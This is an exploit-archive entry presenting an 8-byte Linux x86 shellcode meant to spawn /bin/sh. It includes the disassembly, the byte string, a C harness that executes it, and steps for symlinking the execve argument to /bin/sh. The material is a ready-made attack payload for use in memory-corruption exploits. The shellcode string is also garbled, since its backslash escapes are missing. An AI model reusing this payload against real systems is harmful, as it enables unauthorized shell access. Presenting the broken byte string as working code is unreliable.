Linux x86 - /bin/sh 8 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux x86 - /bin/sh 8 bytes
# Published : 2010-02-23
# Author : JungHoon Shin
# Previous Title : Win32 Shellcode (cmd.exe) for XP SP3 English 26 Bytes
# Next Title : Linux bin/cat /etc/passwd 43 bytes

/*
08048334 <main>:
 8048334:	99                   	cltd
 8048335:	6a 0b                	push   $0xb
 8048337:	58                   	pop    %eax
 8048338:	60                   	pusha
 8048339:	59                   	pop    %ecx
 804833a:	cd 80                	int    $0x80

using this code.

step1. This code is compiled.
step2. strace -x output binary
step3. get execve args in strace result.
step4. create link execve args on /bin/sh

*/

unsigned char sc[]=
"x99x6ax0bx58x60x59xcdx80";
int main()
{
	void (*p)();
	p = sc;
	p();
}

have a nice day~

thx~

-- 
INTO THE WORLD!